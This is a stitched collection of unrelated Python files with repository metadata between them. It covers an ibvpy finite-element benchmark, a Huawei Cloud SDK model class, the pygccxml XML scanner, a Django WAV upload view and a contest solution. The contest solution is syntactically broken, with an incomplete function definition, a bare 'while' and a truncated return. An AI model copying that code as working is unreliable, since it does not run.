from ibvpy.dots.avg_fn import AveragingFunction, LinearAF,QuarticAF
def app():
    """Set up and run a 2-D finite-element rotation benchmark (ibvpy).

    A 20x10 quad grid is rotated rigidly by ~2 degrees via prescribed
    corner displacements, then the time loop is evaluated and the
    results opened in the IBVPy UI. NOTE(review): behaviour depends
    entirely on the ibvpy project libraries, not visible here.
    """
    # Scalar-damage material (defined but unused below; `me` is used).
    mp = MATS2DScalarDamage(E = 1.,
                            nu = 0.2,
                            epsilon_0 = 1.e-3,
                            epsilon_f = 5.e-3,
                            #stiffness = "algorithmic",
                            stress_state = "plane_strain",
                            stiffness = "secant",
                            strain_norm = Euclidean())
    me = MATS2DElastic(E = 34e3,
                       nu = 0.,
                       stress_state = "plane_strain")
    # 9-node quadratic quad elements, 3x3 Gauss integration.
    fets_eval = FETS2D4Q9U(mats_eval = me, ngp_r = 3, ngp_s = 3)
    # Discretization
    fe_domain = FEDomain()
    fe_level1 = FERefinementGrid( domain = fe_domain,
                                  fets_eval = fets_eval,
                                  averaging = QuarticAF(radius = 0.25,
                                                        correction = True))
    fe_grid = FEGrid( #coord_min = (-1.,-.5,0.),
                      coord_max = (2.,1.,0.),
                      shape = (20,10),
                      fets_eval = fets_eval,
                      level = fe_level1 )
    # Piecewise-linear load history: ramp to 1, then hold.
    mf = MFnLineArray( #xdata = arange(10),
                       ydata = array([0,1,1]) )
    angle = 2.#[deg]
    angle_r = deg2rad(angle)
    # Half-angle sines/cosines for the chord displacement of each corner.
    s_angle = sin(angle_r/2.)
    c_angle = cos(angle_r/2.)
    # Diagonal corner: length sqrt(5) at inclination arctan(1/2).
    l_diag = sqrt(5.)
    d_angle = arctan(0.5)
    s_diag = sin((angle_r+d_angle))
    c_diag = cos((angle_r+d_angle))
    ts = TS(sdomain = fe_domain,
             # conversion to list (square brackets) is only necessary for slicing of
             # single dofs, e.g "get_left_dofs()[0,1]" which elsewise retuns an integer only
             bcond_list =  [
                        # constraint for all left dofs in y-direction:
                        # origin corner pinned; remaining corners follow the
                        # rigid-rotation displacement field via `mf`.
                        BCSlice(var='u', slice = fe_grid[0,0,0,0],dims=[0,1], value = 0.),
                        BCSlice(var='u', slice = fe_grid[-1,0,-1,0],dims=[1],
                                time_function = mf.get_value, value = 2*s_angle*2*c_angle),
                        BCSlice(var='u', slice = fe_grid[-1,0,-1,0],dims=[0],
                                time_function = mf.get_value, value = - 2*s_angle**2*2),
                        BCSlice(var='u', slice = fe_grid[0,-1,0,-1],dims=[0],
                                time_function = mf.get_value, value = - 1*s_angle*2*c_angle),
                        BCSlice(var='u', slice = fe_grid[0,-1,0,-1],dims=[1],
                                time_function = mf.get_value, value = - 1*s_angle**2*2),
                        BCSlice(var='u', slice = fe_grid[-1,-1,-1,-1],dims = [1],
                                time_function = mf.get_value, value = s_diag*l_diag - 1.),
                        BCSlice(var='u', slice = fe_grid[-1,-1,-1,-1],dims = [0],
                                time_function = mf.get_value, value = c_diag*l_diag - 2.)
                        ],
         rtrace_list =  [
#                         RTraceGraph(name = 'Fi,right over u_right (iteration)' ,
#                               var_y = 'F_int', idx_y = right_dof,
#                               var_x = 'U_k', idx_x = right_dof,
#                               record_on = 'update'),
                        RTraceDomainListField(name = 'Deformation' ,
                                       var = 'eps', idx = 0,
                                       record_on = 'update'),
                         RTraceDomainListField(name = 'Displacement' ,
                                        var = 'u', idx = 1,
                                        record_on = 'update',
                                        warp = True),
                         RTraceDomainListField(name = 'Damage' ,
                                        var = 'omega', idx = 0,
                                        record_on = 'update',
                                        warp = True),
#                        RTraceDomainField(name = 'Stress' ,
#                                        var = 'sig', idx = 0,
#                                        record_on = 'update'),
#                        RTraceDomainField(name = 'N0' ,
#                                       var = 'N_mtx', idx = 0,
#                                       record_on = 'update')
                ]
            )
    # Add the time-loop control
    #
    tl = TLoop( tstepper = ts,
                tolerance = 1.e-4,
                tline  = TLine( min = 0.0,  step = 1., max = 2.0 ))
    tl.eval()
    # Put the whole stuff into the simulation-framework to map the
    # individual pieces of definition into the user interface.
    #
    from ibvpy.plugins.ibvpy_app import IBVPyApp
    ibvpy_app = IBVPyApp( ibv_resource = ts )
    ibvpy_app.main()
if __name__ == '__main__':
    app()
|
[
"Axel@Axel-Pc"
] |
Axel@Axel-Pc
|
bf1b684d24bbc4cf5a7179c2bf9f39cda4883aac
|
f9d564f1aa83eca45872dab7fbaa26dd48210d08
|
/huaweicloud-sdk-eihealth/huaweicloudsdkeihealth/v1/model/delete_nextflow_job_request.py
|
83b25425a82c6befc3917dc50bb320e6b8812723
|
[
"Apache-2.0"
] |
permissive
|
huaweicloud/huaweicloud-sdk-python-v3
|
cde6d849ce5b1de05ac5ebfd6153f27803837d84
|
f69344c1dadb79067746ddf9bfde4bddc18d5ecf
|
refs/heads/master
| 2023-09-01T19:29:43.013318
| 2023-08-31T08:28:59
| 2023-08-31T08:28:59
| 262,207,814
| 103
| 44
|
NOASSERTION
| 2023-06-22T14:50:48
| 2020-05-08T02:28:43
|
Python
|
UTF-8
|
Python
| false
| false
| 4,327
|
py
|
# coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class DeleteNextflowJobRequest:
    """Request model for deleting a Nextflow job (generated SDK code).

    Attributes:
        openapi_types (dict): The key is attribute name
                            and the value is attribute type.
        attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    sensitive_list = []
    openapi_types = {
        'eihealth_project_id': 'str',
        'job_id': 'str'
    }
    attribute_map = {
        'eihealth_project_id': 'eihealth_project_id',
        'job_id': 'job_id'
    }
    def __init__(self, eihealth_project_id=None, job_id=None):
        """DeleteNextflowJobRequest
        The model defined in huaweicloud sdk
        :param eihealth_project_id: EIHealth project ID. On the EIHealth platform, click the desired project name and open the project settings page to view it.
        :type eihealth_project_id: str
        :param job_id: Job ID
        :type job_id: str
        """
        self._eihealth_project_id = None
        self._job_id = None
        self.discriminator = None
        self.eihealth_project_id = eihealth_project_id
        self.job_id = job_id
    @property
    def eihealth_project_id(self):
        """Gets the eihealth_project_id of this DeleteNextflowJobRequest.
        EIHealth project ID. On the EIHealth platform, click the desired project name and open the project settings page to view it.
        :return: The eihealth_project_id of this DeleteNextflowJobRequest.
        :rtype: str
        """
        return self._eihealth_project_id
    @eihealth_project_id.setter
    def eihealth_project_id(self, eihealth_project_id):
        """Sets the eihealth_project_id of this DeleteNextflowJobRequest.
        EIHealth project ID. On the EIHealth platform, click the desired project name and open the project settings page to view it.
        :param eihealth_project_id: The eihealth_project_id of this DeleteNextflowJobRequest.
        :type eihealth_project_id: str
        """
        self._eihealth_project_id = eihealth_project_id
    @property
    def job_id(self):
        """Gets the job_id of this DeleteNextflowJobRequest.
        Job ID
        :return: The job_id of this DeleteNextflowJobRequest.
        :rtype: str
        """
        return self._job_id
    @job_id.setter
    def job_id(self, job_id):
        """Sets the job_id of this DeleteNextflowJobRequest.
        Job ID
        :param job_id: The job_id of this DeleteNextflowJobRequest.
        :type job_id: str
        """
        self._job_id = job_id
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                # Sensitive attributes are masked in the serialized output.
                if attr in self.sensitive_list:
                    result[attr] = "****"
                else:
                    result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        import simplejson as json
        if six.PY2:
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")
        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
    def __repr__(self):
        """For `print`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, DeleteNextflowJobRequest):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
574a978e3031c00ce0d37a59ee379800c4f2d854
|
a3b306df800059a5b74975793251a28b8a5f49c7
|
/Graphs/LX-2/molecule_otsu = False/BioImageXD-1.0/ITK/lib/InsightToolkit/WrapITK/Configuration/Languages/SwigInterface/pygccxml-1.0.0/pygccxml/parser/scanner.py
|
967c877a080cf5e421a7027aab7eb78b513ab7b5
|
[
"BSL-1.0"
] |
permissive
|
giacomo21/Image-analysis
|
dc17ba2b6eb53f48963fad931568576fda4e1349
|
ea8bafa073de5090bd8f83fb4f5ca16669d0211f
|
refs/heads/master
| 2016-09-06T21:42:13.530256
| 2013-07-22T09:35:56
| 2013-07-22T09:35:56
| 11,384,784
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,301
|
py
|
# Copyright 2004-2008 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0. (See
# accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
import os
import types
import pprint
import xml.sax
import warnings
import xml.sax.handler
from pygccxml.declarations import *
from pygccxml import utils
##convention
#XML_NN - XML Node Name
#XML_AN - XML Attribute Name
#also those constants are sorted for easy searching.
XML_AN_ABSTRACT = "abstract"
XML_AN_ACCESS = "access"
XML_AN_ALIGN = "align"
XML_AN_ARTIFICIAL = "artificial"
XML_AN_ATTRIBUTES = "attributes"
XML_AN_BASE_TYPE = "basetype"
XML_AN_BASES = "bases"
XML_AN_BITS = "bits"
XML_AN_CONST = "const"
XML_AN_CONTEXT = "context"
XML_AN_CVS_REVISION = "cvs_revision"
XML_AN_DEFAULT = "default"
XML_AN_DEMANGLED = "demangled"
XML_AN_EXTERN = "extern"
XML_AN_FILE = "file"
XML_AN_ID = "id"
XML_AN_INCOMPLETE = "incomplete"
XML_AN_INIT = "init"
XML_AN_LINE = "line"
XML_AN_MANGLED = "mangled"
XML_AN_MAX = "max"
XML_AN_MEMBERS = "members"
XML_AN_MUTABLE = "mutable"
XML_AN_NAME = "name"
XML_AN_OFFSET = "offset"
XML_AN_PURE_VIRTUAL = "pure_virtual"
XML_AN_RESTRICT = "restrict"
XML_AN_RETURNS = "returns"
XML_AN_SIZE = "size"
XML_AN_STATIC = "static"
XML_AN_THROW = "throw"
XML_AN_TYPE = "type"
XML_AN_VIRTUAL = "virtual"
XML_AN_VOLATILE = "volatile"
XML_NN_ARGUMENT = "Argument"
XML_NN_ARRAY_TYPE = "ArrayType"
XML_NN_CASTING_OPERATOR = "Converter"
XML_NN_CLASS = "Class"
XML_NN_CONSTRUCTOR = "Constructor"
XML_NN_CV_QUALIFIED_TYPE = "CvQualifiedType"
XML_NN_DESTRUCTOR = "Destructor"
XML_NN_ELLIPSIS = "Ellipsis"
XML_NN_ENUMERATION = "Enumeration"
XML_NN_ENUMERATION_VALUE = "EnumValue"
XML_NN_FIELD = "Field"
XML_NN_FILE = "File"
XML_NN_FUNCTION = "Function"
XML_NN_FUNCTION_TYPE = "FunctionType"
XML_NN_FUNDAMENTAL_TYPE = "FundamentalType"
XML_NN_FREE_OPERATOR = "OperatorFunction"
XML_NN_GCC_XML = "GCC_XML"
XML_NN_MEMBER_OPERATOR = "OperatorMethod"
XML_NN_METHOD = "Method"
XML_NN_METHOD_TYPE = "MethodType"
XML_NN_NAMESPACE = "Namespace"
XML_NN_OFFSET_TYPE = "OffsetType"
XML_NN_POINTER_TYPE = "PointerType"
XML_NN_REFERENCE_TYPE = "ReferenceType"
XML_NN_ROOT = "GCC_XML"
XML_NN_STRUCT = "Struct"
XML_NN_TYPEDEF = "Typedef"
XML_NN_UNION = "Union"
XML_NN_VARIABLE = "Variable"
class scanner_t( xml.sax.handler.ContentHandler ):
def __init__(self, gccxml_file, decl_factory, *args ):
xml.sax.handler.ContentHandler.__init__(self, *args )
self.logger = utils.loggers.gccxml
self.gccxml_file = gccxml_file
#defining parsing tables
self.__readers = {
XML_NN_FILE : self.__read_file
, XML_NN_NAMESPACE : self.__read_namespace
, XML_NN_ENUMERATION : self.__read_enumeration
, XML_NN_ENUMERATION_VALUE : self.__read_enumeration_value
, XML_NN_ARRAY_TYPE : self.__read_array_type
, XML_NN_CV_QUALIFIED_TYPE : self.__read_cv_qualified_type
, XML_NN_POINTER_TYPE : self.__read_pointer_type
, XML_NN_REFERENCE_TYPE : self.__read_reference_type
, XML_NN_FUNDAMENTAL_TYPE : self.__read_fundamental_type
, XML_NN_ARGUMENT : self.__read_argument
, XML_NN_FUNCTION_TYPE : self.__read_function_type
, XML_NN_METHOD_TYPE : self.__read_method_type
, XML_NN_OFFSET_TYPE : self.__read_offset_type
, XML_NN_TYPEDEF : self.__read_typedef
, XML_NN_VARIABLE : self.__read_variable
, XML_NN_CLASS : self.__read_class
, XML_NN_STRUCT : self.__read_struct
, XML_NN_UNION : self.__read_union
, XML_NN_FIELD : self.__read_field
, XML_NN_CASTING_OPERATOR : self.__read_casting_operator
, XML_NN_CONSTRUCTOR : self.__read_constructor
, XML_NN_DESTRUCTOR : self.__read_destructor
, XML_NN_FUNCTION : self.__read_function
, XML_NN_FREE_OPERATOR : self.__read_free_operator
, XML_NN_MEMBER_OPERATOR : self.__read_member_operator
, XML_NN_METHOD : self.__read_method
, XML_NN_GCC_XML : self.__read_version
, XML_NN_ELLIPSIS : self.__read_ellipsis
}
self.deep_declarations = [
XML_NN_CASTING_OPERATOR
, XML_NN_CONSTRUCTOR
, XML_NN_DESTRUCTOR
, XML_NN_ENUMERATION
, XML_NN_FILE
, XML_NN_FUNCTION
, XML_NN_FREE_OPERATOR
, XML_NN_MEMBER_OPERATOR
, XML_NN_METHOD
, XML_NN_FUNCTION_TYPE
, XML_NN_METHOD_TYPE
]
assert isinstance( decl_factory, decl_factory_t )
self.__decl_factory = decl_factory
#mapping from id -> decl
self.__declarations = {}
#list of all read declarations
self.__calldefs = []
#list of enums I need later
self.__enums = []
#mapping from id -> type
self.__types = {}
#mapping from id -> file
self.__files = {}
#mapping between decl id -> access
self.__access = {}
#current object under construction
self.__inst = None
#mapping from id to members
self.__members = {}
self.__compiler = None
def read( self ):
xml.sax.parse( self.gccxml_file, self )
def endDocument( self ):
#updating membership
members_mapping = {}
for gccxml_id, members in self.__members.iteritems():
decl = self.__declarations.get( gccxml_id, None )
if not decl or not isinstance( decl, scopedef_t):
continue
members_mapping[ id( decl ) ] = members
self.__members = members_mapping
def declarations(self):
return self.__declarations
def calldefs( self ):
return self.__calldefs
def enums(self):
return self.__enums
def types(self):
return self.__types
def files(self):
return self.__files
def access(self):
return self.__access
def members(self):
return self.__members
def startElementNS(self, name, qname, attrs):
return self.startElement( name[1], attrs )
def endElementNS(self, name, qname):
return self.endElement( name[1] )
def startElement(self, name, attrs):
try:
if name not in self.__readers:
return
obj = self.__readers[name]( attrs )
if not obj:
return #it means that we worked on internals
#for example EnumValue of function argument
if name in self.deep_declarations:
self.__inst = obj
self.__read_access( attrs )
element_id = attrs.get(XML_AN_ID, None)
if isinstance( obj, declaration_t ):
obj.compiler = self.__compiler
self.__update_membership( attrs )
self.__declarations[ element_id ] = obj
if not isinstance( obj, namespace_t ):
self.__read_location( obj, attrs )
if isinstance( obj, class_t):
self.__read_bases( obj, attrs )
self.__read_artificial(obj, attrs)
self.__read_mangled( obj, attrs)
self.__read_demangled( obj, attrs)
self.__read_attributes(obj, attrs)
elif isinstance( obj, type_t ):
self.__types[ element_id ] = obj
self.__read_byte_size(obj, attrs)
self.__read_byte_align(obj, attrs)
elif isinstance( obj, types.StringTypes ):
self.__files[ element_id ] = obj
else:
self.logger.warning( 'Unknown object type has been found.'
+ ' Please report this bug to pygccxml development team.' )
except Exception, error:
msg = 'error occured, while parsing element with name "%s" and attrs "%s".'
msg = msg + os.linesep + 'Error: %s.' % str( error )
self.logger.error( msg % ( name, pprint.pformat( attrs.keys() ) ) )
raise
def endElement(self, name):
if name in self.deep_declarations:
self.__inst = None
def __read_location(self, decl, attrs):
decl.location = location_t( file_name=attrs[XML_AN_FILE], line=int(attrs[XML_AN_LINE]))
def __update_membership(self, attrs):
parent = attrs.get( XML_AN_CONTEXT, None )
if not parent:
return
if not self.__members.has_key( parent ):
self.__members[ parent ] = []
self.__members[parent].append( attrs[XML_AN_ID] )
def __read_members(self, decl, attrs ):
decl.declarations = attrs.get(XML_AN_MEMBERS, "")
def __read_bases(self, decl, attrs ):
decl.bases = attrs.get( XML_AN_BASES, "" )
def __read_artificial( self, decl, attrs ):
decl.is_artificial = attrs.get( XML_AN_ARTIFICIAL, False )
def __read_mangled( self, decl, attrs ):
decl.mangled = attrs.get( XML_AN_MANGLED, None )
def __read_demangled( self, decl, attrs ):
decl.demangled = attrs.get( XML_AN_DEMANGLED, None )
def __read_attributes( self, decl, attrs ):
decl.attributes = attrs.get( XML_AN_ATTRIBUTES, None )
def __read_access( self, attrs ):
self.__access[ attrs[XML_AN_ID] ] = attrs.get( XML_AN_ACCESS, ACCESS_TYPES.PUBLIC )
def __read_byte_size (self, decl, attrs):
"Using duck typing to set the size instead of in constructor"
size = attrs.get(XML_AN_SIZE, 0)
decl.byte_size = int(size)/8 # Make sure the size is in bytes instead of bits
def __read_byte_offset (self, decl, attrs):
"Using duck typing to set the offset instead of in constructor"
offset = attrs.get(XML_AN_OFFSET, 0)
decl.byte_offset = int(offset)/8 # Make sure the size is in bytes instead of bits
def __read_byte_align (self, decl, attrs):
"Using duck typing to set the alignment"
align = attrs.get(XML_AN_ALIGN, 0)
decl.byte_align = int(align)/8 # Make sure the size is in bytes instead of bits
def __read_root(self, attrs):
pass
def __read_file( self, attrs ):
return attrs.get( XML_AN_NAME, '' )
def __read_namespace(self, attrs):
ns_name = attrs.get( XML_AN_NAME, '' )
if '.' in ns_name:
#if '.' in namespace then this is mangled namespace -> in c++ namespace{...}
#that is almost true: gcc mangale name using top file name.
#almost all files has '.' in name
ns_name = ''
return self.__decl_factory.create_namespace( name=ns_name )
def __read_enumeration(self, attrs):
enum_name = attrs.get( XML_AN_NAME, '' )
if '$_' in enum_name or '._' in enum_name:
#it means that this is unnamed enum. in c++ enum{ x };
enum_name = ''
decl = self.__decl_factory.create_enumeration( name=enum_name )
self.__read_byte_size(decl, attrs)
self.__read_byte_align(decl, attrs)
self.__enums.append( decl )
return decl
def __read_enumeration_value( self, attrs ):
name = attrs.get( XML_AN_NAME, '' )
num = int(attrs[XML_AN_INIT])
self.__inst.append_value(name, num)
def __guess_int_value( self, value_as_str ):
#returns instance of int or None
#if gcc compiled the code, than it is correct!
numeric_suffix_letters = 'UuLlFf'
for s in numeric_suffix_letters:
value_as_str = value_as_str.replace( s, '' )
try:
return int( value_as_str )
except ValueError:
try:
return int( value_as_str, 16 )
except ValueError:
return None
def __read_array_type( self, attrs ):
type_ = attrs[ XML_AN_TYPE ]
size = self.__guess_int_value( attrs.get(XML_AN_MAX, '' ) )
if size is None:
size = array_t.SIZE_UNKNOWN
msg = 'unable to find out array size from expression "%s"' % attrs[ XML_AN_MAX ]
# warning is absolutely useless without much clue
# warnings.warn( msg )
return array_t( type_, size + 1 )
def __read_cv_qualified_type( self, attrs ):
if attrs.has_key( XML_AN_CONST ):
return const_t( attrs[XML_AN_TYPE] )
elif attrs.has_key( XML_AN_VOLATILE ):
return volatile_t( attrs[XML_AN_TYPE] )
elif attrs.has_key( XML_AN_RESTRICT ):
return restrict_t( attrs[XML_AN_TYPE] )
else:
assert 0
def __read_pointer_type( self, attrs ):
return pointer_t( attrs[XML_AN_TYPE] )
def __read_reference_type( self, attrs ):
return reference_t( attrs[XML_AN_TYPE] )
def __read_fundamental_type(self, attrs ):
try:
return FUNDAMENTAL_TYPES[ attrs.get( XML_AN_NAME, '' ) ]
except KeyError:
raise RuntimeError( "pygccxml error: unable to find fundamental type with name '%s'."
% attrs.get( XML_AN_NAME, '' ) )
def __read_offset_type( self,attrs ):
base = attrs[ XML_AN_BASE_TYPE ]
type_ = attrs[ XML_AN_TYPE ]
if '0.9' in self.__compiler:
return pointer_t( member_variable_type_t( class_inst=base, variable_type=type_ ) )
else:
return member_variable_type_t( class_inst=base, variable_type=type_ )
def __read_argument( self, attrs ):
if isinstance( self.__inst, calldef_type_t ):
self.__inst.arguments_types.append( attrs[XML_AN_TYPE] )
else:
argument = argument_t()
argument.name = attrs.get( XML_AN_NAME, 'arg%d' % len(self.__inst.arguments) )
argument.type = attrs[XML_AN_TYPE]
argument.default_value = attrs.get( XML_AN_DEFAULT, None )
self.__read_attributes( argument, attrs )
if argument.default_value == '<gccxml-cast-expr>':
argument.default_value = None
self.__inst.arguments.append( argument )
def __read_ellipsis( self, attrs ):
if isinstance( self.__inst, calldef_type_t ):
self.__inst.arguments_types.append( '...' )
else:
argument = argument_t( type='...' )
self.__inst.arguments.append( argument )
def __read_calldef( self, calldef, attrs, is_declaration ):
#destructor for example doesn't have return type
calldef.return_type = attrs.get( XML_AN_RETURNS, None )
if is_declaration:
self.__calldefs.append( calldef )
calldef.name = attrs.get(XML_AN_NAME, '')
calldef.has_extern = attrs.get( XML_AN_EXTERN, False )
throw_stmt = attrs.get( XML_AN_THROW, None )
if None is throw_stmt:
calldef.does_throw = True
calldef.exceptions = []
elif "" == throw_stmt:
calldef.does_throw = False
calldef.exceptions = []
else:
calldef.does_throw = True
calldef.exceptions = throw_stmt.split()
def __read_member_function( self, calldef, attrs, is_declaration ):
self.__read_calldef( calldef, attrs, is_declaration )
calldef.has_const = attrs.get( XML_AN_CONST, False )
if is_declaration:
calldef.has_static = attrs.get( XML_AN_STATIC, False )
if attrs.has_key( XML_AN_PURE_VIRTUAL ):
calldef.virtuality = VIRTUALITY_TYPES.PURE_VIRTUAL
elif attrs.has_key( XML_AN_VIRTUAL ):
calldef.virtuality = VIRTUALITY_TYPES.VIRTUAL
else:
calldef.virtuality = VIRTUALITY_TYPES.NOT_VIRTUAL
else:
calldef.class_inst = attrs[XML_AN_BASE_TYPE]
def __read_function_type(self, attrs):
answer = free_function_type_t()
self.__read_calldef( answer, attrs, False )
return answer
def __read_method_type(self, attrs):
answer = member_function_type_t()
self.__read_member_function( answer, attrs, False )
return answer
def __read_typedef(self, attrs ):
return self.__decl_factory.create_typedef( name=attrs.get( XML_AN_NAME, '' ), type=attrs[XML_AN_TYPE])
def __read_variable(self, attrs ):
type_qualifiers = type_qualifiers_t()
type_qualifiers.has_mutable = attrs.get(XML_AN_MUTABLE, False)
type_qualifiers.has_static = attrs.get(XML_AN_EXTERN, False)
bits = attrs.get( XML_AN_BITS, None )
if bits:
bits = int( bits )
decl = self.__decl_factory.create_variable( name=attrs.get( XML_AN_NAME, '' )
, type=attrs[XML_AN_TYPE]
, type_qualifiers=type_qualifiers
, value=attrs.get( XML_AN_INIT, None )
, bits=bits)
self.__read_byte_offset(decl, attrs)
return decl
__read_field = __read_variable #just a synonim
def __read_class_impl(self, class_type, attrs):
decl = None
name = attrs.get(XML_AN_NAME, '')
if '$' in name or '.' in name:
name = ''
if attrs.has_key( XML_AN_INCOMPLETE ):
decl = self.__decl_factory.create_class_declaration(name=name)
else:
decl = self.__decl_factory.create_class( name=name, class_type=class_type )
if attrs.get( XML_AN_ABSTRACT, False ):
decl.is_abstract = True
else:
decl.is_abstract = False
self.__read_byte_size(decl, attrs)
self.__read_byte_align(decl, attrs)
return decl
def __read_class( self, attrs ):
return self.__read_class_impl( CLASS_TYPES.CLASS, attrs )
def __read_struct( self, attrs ):
return self.__read_class_impl( CLASS_TYPES.STRUCT, attrs )
def __read_union( self, attrs ):
return self.__read_class_impl( CLASS_TYPES.UNION, attrs )
def __read_casting_operator(self, attrs ):
operator = self.__decl_factory.create_casting_operator()
self.__read_member_function( operator, attrs, True )
return operator
def __read_constructor( self, attrs ):
constructor = self.__decl_factory.create_constructor()
self.__read_member_function( constructor, attrs, True )
return constructor
def __read_function(self, attrs):
gfunction = self.__decl_factory.create_free_function()
self.__read_calldef( gfunction, attrs, True )
return gfunction
def __read_method(self, attrs):
mfunction = self.__decl_factory.create_member_function()
self.__read_member_function( mfunction, attrs, True )
return mfunction
def __read_destructor(self, attrs):
destructor = self.__decl_factory.create_destructor()
self.__read_member_function( destructor, attrs, True )
destructor.name = '~' + destructor.name
return destructor
def __read_free_operator(self, attrs ):
operator = self.__decl_factory.create_free_operator()
self.__read_member_function( operator, attrs, True )
if 'new' in operator.name or 'delete' in operator.name:
operator.name = 'operator ' + operator.name
else:
operator.name = 'operator' + operator.name
return operator
def __read_member_operator(self, attrs):
operator = self.__decl_factory.create_member_operator()
self.__read_member_function( operator, attrs, True )
if 'new' in operator.name or 'delete' in operator.name:
operator.name = 'operator ' + operator.name
else:
operator.name = 'operator' + operator.name
return operator
def __read_version(self, attrs):
logger = utils.loggers.cxx_parser
version = float( attrs.get(XML_AN_CVS_REVISION, 0.6) )
if version is None:
logger.info ( 'GCCXML version - 0.6' )
self.__compiler = compilers.GCC_XML_06
elif version <= 1.114:
logger.info ( 'GCCXML version - 0.7' )
self.__compiler = compilers.GCC_XML_07
elif version in ( 1.115, 1.116, 1.117, 1.118, 1.119, 1.120, 1.121 ):
logger.info ( 'GCCXML version - 0.9 BUGGY' )
self.__compiler = compilers.GCC_XML_09_BUGGY
else:
logger.info ( 'GCCXML version - 0.9' )
self.__compiler = compilers.GCC_XML_09
|
[
"fede.anne95@hotmail.it"
] |
fede.anne95@hotmail.it
|
7e5bdb95eceb8d543706dd352ce4101905da500f
|
95c71453ed6cc6f9b94f38a3c1655680618d71a4
|
/kickstart/DE/EC.py
|
477f7b6f874fc7fe1f0ee7f7bd160a909212de3b
|
[] |
no_license
|
ZX1209/gl-algorithm-practise
|
95f4d6627c1dbaf2b70be90149d897f003f9cb3a
|
dd0a1c92414e12d82053c3df981897e975063bb8
|
refs/heads/master
| 2020-05-16T14:56:34.568878
| 2019-12-27T07:37:11
| 2019-12-27T07:37:11
| 183,116,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,112
|
py
|
from collections import Counter
def isOdd(n):
return n % 2
def sortl(ls):
sums = Counter()
tmpl = []
for i in range(len(ls)):
sums[i] = sum(ls[i])
for i, j in sums.most_common():
tmpl.append(ls[i])
return tmpl
def rate(lhu,lla):
win = 0
total = 0
for hu in lhu:
for la in lla:
total += 1
if hu>la:
win+=1
return wi
def dfs()
# la win >=
# hu win >
def solve_EC(N, hu, la):
lla = [sum(la[i:i+N]) for i in range(N)]
win = 0
lla.sort()
hu.sort()
while
for i in range(3*N):
if hu[i] > la[i]:
win += 1
return win/(3*N)
def main():
T = int(input())
for t in range(T):
tmp = input().split()
tmp = list(map(int, tmp))
N, = tmp
tmp = input().split()
tmp = list(map(int, tmp))
hu = tmp
tmp = input().split()
tmp = list(map(int, tmp))
la = tmp
print('Case #' + str(t + 1) + ': ', end='')
print(solve_EC(N, hu, la))
if __name__ == '__main__':
main()
|
[
"1404919041@qq.com"
] |
1404919041@qq.com
|
cdd78006ece1d3fe85d569ed5cd2713d6c9d3dc0
|
b5abb217826b531c8f4c24c74df5620cf89234e0
|
/tutorial/quickstart/views/wavsViews.py
|
96d52c59b977477927374207b08abe16e53cc95d
|
[] |
no_license
|
zhwj2015/speech
|
bedf80c2842b3c344cd1932ba22b71ecaddb84dc
|
5155a45b088acaca6988e910927197e2da71f556
|
refs/heads/master
| 2016-09-06T09:53:05.564149
| 2015-07-08T00:14:27
| 2015-07-08T00:14:27
| 37,200,594
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,167
|
py
|
__author__ = 'Administor'
from rest_framework import viewsets
from tutorial.quickstart.models import Wavs, Users
from tutorial.quickstart.serializers import WavsSerializer
from rest_framework.response import Response
import os
from rest_framework.renderers import JSONRenderer
from django.utils.six import BytesIO
from rest_framework.parsers import JSONParser
from tutorial.quickstart.util import Util, JSONResponse
class WavsViews(viewsets.ModelViewSet):
queryset = Wavs.objects.all()
serializer_class = WavsSerializer
def create(self, request, *args, **kwargs):
try:
pass
# filename = request.data['wavs'].name
# suffix=filename[filename.find('.'):]
# name = Util.getTimestamp()
# filename = str(name)+str(suffix)
# path = 'wavs/'+filename
# user_id = request.data['uid']
# user = Users.objects.all().get(user_id=user_id)
# created = request.data['created']
# created = Util.strToTime(created,'%Y-%m-%d')
#
# if not os.path.exists('wavs/'):
# os.makedirs('wavs/')
# out = open(path, 'wb+')
# infile = request.data['wavs']
# for chunk in infile.chunks():
# out.write(chunk)
# out.flush()
# out.close()
# wav = Wavs(wav_id=name, name=filename, path=path, user_id=user, created=created, score=0)
# serializer = WavsSerializer(wav)
# json = JSONRenderer().render(serializer.data)
# stream = BytesIO(json)
# data = JSONParser().parse(stream)
# serializer = WavsSerializer(data=data)
# #object to JSON
# # data = Util.serializeToJSON(serializer)
# #
# # serializer = WavsSerializer(data=data)
# if serializer.is_valid():
# wav.save()
# else:
# return JSONResponse({'status': False})
except Exception, e:
print "error"
return JSONResponse({'status': False})
return JSONResponse({'status': True})
|
[
"1654339276@qq.com"
] |
1654339276@qq.com
|
4450e3282bc9a86c113545d0d5972bb6830b3915
|
25176b716df2bd519703c6e3cbc761d1b8b192c1
|
/src/app/interfaces/redis.py
|
a5133a0dc8d716666dec6fb805c35b0bedf27523
|
[] |
no_license
|
kain-jy/python-clean-architecture
|
74521d411b1d53f007e80e74c8abe5c64591d321
|
a5365818026a6b4da47dae64b099c1de5c8b5005
|
refs/heads/master
| 2020-04-21T00:03:13.797032
| 2019-02-05T03:22:24
| 2019-02-05T03:24:26
| 169,184,834
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 802
|
py
|
import json
import redis
from .. import usecases
